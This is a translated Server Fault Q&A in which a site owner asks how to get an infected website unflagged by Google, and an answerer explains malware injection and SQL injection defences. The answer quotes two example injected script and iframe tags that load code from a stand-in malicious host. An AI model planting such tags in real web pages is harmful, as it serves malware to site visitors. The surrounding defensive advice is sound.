我的網站被感染了，我恢復了未感染文件的備份，取消標記為危險需要多長時間？

我的網站 www.sagamountain.com 最近被惡意軟體分發者感染（或者至少我認為可能已經感染）。

我已刪除所有外部內容、Google廣告、螢火蟲聊天等。

我上傳了幾週前的備份，當時沒有問題。

我修補了 SQL 注入漏洞。

現在，將其取消標記為危險需要多長時間？我在哪裡可以聯繫Google？

我不確定這是否是發布它的正確位置，但由於它可能是伺服器問題，我也可以。站點可以通過病毒在整個伺服器上註入base64程式碼，還是僅通過sql注入？

謝謝你的幫助，病毒把我嚇壞了。

是否有可以掃描我的頁面並告訴我問題所在的線上病毒掃描程序？

關於Google，查看他們關於受惡意軟體感染的網站的頁面。

我的網站和 Google › 我的網站被黑了

您將需要登錄到他們的網站管理員工具頁面，將您的網站添加到您的帳戶並執行驗證步驟。然後，您將可以訪問做一些事情，例如要求您的網站接受審查，不再被感染。

這是當今相對普遍的問題。許多蠕蟲試圖通過 SQL 注入或修改本地 .html 內容，然後將其上傳到 Web 伺服器，從而使自己進入您的伺服器程式碼。通常他們會嘗試放置：

<script src='http://badwebsite.ru/blah.js'></script>

要麼

<iframe src='http://badwebsite.ru/blah.html' />

通過 SQL 注入或原始碼修改進入您的源頁面。

據我所知，這些蠕蟲通過 JavaScript 混淆引擎或類似引擎修改它們的攻擊向量，並且難以掃描。

最近兩次大規模遠端程式碼執行使這些攻擊成為可能：

• Adobe Flash JavaScript 漏洞利用允許使用大約 15K 的任意程式碼創建 Flash 對象。
• 對 Windows 系統上由 Microsoft .NET 3.5 安裝的 Firefox 中的 Windows Presentation Framework 擴展的利用。

這兩者都是巨大的安全隱患。

您應該盡可能在 Web 應用程序開發中使用參數綁定，以避免 SQL 注入攻擊。

引用自：https://serverfault.com/questions/78439